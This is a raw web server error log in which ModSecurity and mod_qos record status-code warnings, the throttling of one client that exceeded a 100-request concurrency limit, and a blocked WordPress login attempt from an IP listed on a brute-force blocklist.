[Tue May 26 19:59:08.407844 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y9QAAAcc"]
[Tue May 26 19:59:08.415896 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpTQAAAH0"]
[Tue May 26 19:59:08.425373 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zBAAAAdk"]
[Tue May 26 19:59:08.437198 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpXAAAAHI"]
[Tue May 26 19:59:08.440527 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zFgAAAcQ"]
[Tue May 26 19:59:08.445993 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpZAAAAB4"]
[Tue May 26 19:59:08.649322 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25ziwAAAeU
[Tue May 26 19:59:08.651572 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNGDRMqfxdEDkoszp1QAAAGA
[Tue May 26 19:59:08.653208 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNGDRMqfxdEDkoszp2AAAADs
[Tue May 26 19:59:08.653779 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNGDRMqfxdEDkoszp2QAAAGk
[Tue May 26 19:59:08.653955 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNGDRMqfxdEDkoszp2wAAAGA
[Tue May 26 19:59:08.653964 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuNGDRMqfxdEDkoszp1gAAAFQ
[Tue May 26 19:59:08.654051 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNGDRMqfxdEDkoszp2gAAAAc
[Tue May 26 19:59:08.658122 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNEqK9k_ZUB2Vp25zlAAAAdk
[Tue May 26 19:59:08.659990 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNEqK9k_ZUB2Vp25zlgAAAdM
[Tue May 26 19:59:08.660116 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNEqK9k_ZUB2Vp25zlQAAAf0
[Tue May 26 19:59:08.996705 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszp4QAAADI
[Tue May 26 19:59:08.996849 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zqQAAAcQ
[Tue May 26 19:59:08.998404 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszp4gAAAAg
[Tue May 26 19:59:08.998963 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zqgAAAdo
[Tue May 26 19:59:08.999681 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszp4wAAAAo
[Tue May 26 19:59:09.000390 2026] [qos:error] [pid 93868:tid 94309] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zrAAAAcI
[Tue May 26 19:59:09.004308 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25zrQAAAe4
[Tue May 26 19:59:09.007861 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25zrgAAAe0
[Tue May 26 19:59:09.008533 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25zrwAAAe0
[Tue May 26 19:59:09.010205 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszp5AAAABo
[Tue May 26 19:59:09.032882 2026] [security2:error] [pid 93576:tid 93828] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszpvQAAAHQ"]
[Tue May 26 19:59:09.145950 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25ztQAAAZQ
[Tue May 26 19:59:09.145951 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszp5wAAADA
[Tue May 26 19:59:09.148121 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszp6AAAABE
[Tue May 26 19:59:09.150895 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25ztgAAAe8
[Tue May 26 19:59:09.151911 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25ztwAAAeU
[Tue May 26 19:59:09.153309 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszp6QAAAE4
[Tue May 26 19:59:09.155754 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25zuAAAAZc
[Tue May 26 19:59:09.161363 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25zuQAAAZ4
[Tue May 26 19:59:09.162307 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp25zugAAAdk
[Tue May 26 19:59:09.164231 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszp6gAAACE
[Tue May 26 19:59:09.274863 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zGwAAAcU"]
[Tue May 26 19:59:09.277942 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zDgAAAek"]
[Tue May 26 19:59:09.278523 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zEgAAAfI"]
[Tue May 26 19:59:09.288090 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpcAAAADg"]
[Tue May 26 19:59:09.295711 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpcwAAAFo"]
[Tue May 26 19:59:09.296556 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zIwAAAfA"]
[Tue May 26 19:59:09.307129 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zJAAAAc0"]
[Tue May 26 19:59:09.311511 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zJgAAAcM"]
[Tue May 26 19:59:09.313419 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpcQAAAAQ"]
[Tue May 26 19:59:09.316672 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zKwAAAgg"]
[Tue May 26 19:59:09.319222 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zKQAAAfs"]
[Tue May 26 19:59:09.325856 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpgAAAAAA"]
[Tue May 26 19:59:09.334791 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpfwAAAEc"]
[Tue May 26 19:59:09.338966 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zMQAAAa4"]
[Tue May 26 19:59:09.349335 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpeQAAAHs"]
[Tue May 26 19:59:09.356691 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpegAAAHg"]
[Tue May 26 19:59:09.364855 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpfQAAADM"]
[Tue May 26 19:59:09.371340 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zLwAAAds"]
[Tue May 26 19:59:09.373595 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zZQAAAa0"]
[Tue May 26 19:59:09.376297 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zJQAAAaE"]
[Tue May 26 19:59:09.377024 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zMAAAAag"]
[Tue May 26 19:59:09.388308 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zNQAAAc4"]
[Tue May 26 19:59:09.402121 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zYgAAAgE"]
[Tue May 26 19:59:09.408027 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zQAAAAeQ"]
[Tue May 26 19:59:09.413361 2026] [security2:error] [pid 93868:tid 94351] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zZwAAAew"]
[Tue May 26 19:59:09.414361 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zZgAAAbU"]
[Tue May 26 19:59:09.415070 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zWwAAAao"]
[Tue May 26 19:59:09.415558 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zaAAAAZ8"]
[Tue May 26 19:59:09.431296 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszpsQAAAHA"]
[Tue May 26 19:59:09.431848 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zPgAAAbc"]
[Tue May 26 19:59:09.449612 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zYQAAAZE"]
[Tue May 26 19:59:09.450888 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zaQAAAeI"]
[Tue May 26 19:59:09.555994 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqEQAAAGA
[Tue May 26 19:59:09.558361 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqEgAAAGo
[Tue May 26 19:59:09.566071 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqEwAAAB0
[Tue May 26 19:59:09.571727 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqFQAAAFQ
[Tue May 26 19:59:09.573269 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250DQAAAf4
[Tue May 26 19:59:09.575070 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqFgAAABg
[Tue May 26 19:59:09.583009 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250DwAAAf0
[Tue May 26 19:59:09.585484 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250EAAAAaE
[Tue May 26 19:59:09.603117 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqGAAAABA
[Tue May 26 19:59:09.609109 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqGQAAAHk
[Tue May 26 19:59:09.636273 2026] [security2:error] [pid 93868:tid 94311] [client 31.57.184.20:62449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pgcsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z5gAAAcQ"], referer: https://www.bing.com/
[Tue May 26 19:59:09.812993 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqHwAAAAY
[Tue May 26 19:59:09.814823 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqIAAAACo
[Tue May 26 19:59:09.816440 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqIQAAADQ
[Tue May 26 19:59:09.823000 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqIgAAACg
[Tue May 26 19:59:09.826239 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqIwAAACc
[Tue May 26 19:59:09.827187 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250GAAAAaA
[Tue May 26 19:59:09.828425 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250GQAAAfQ
[Tue May 26 19:59:09.830072 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250GgAAAak
[Tue May 26 19:59:09.836219 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqJAAAAAA
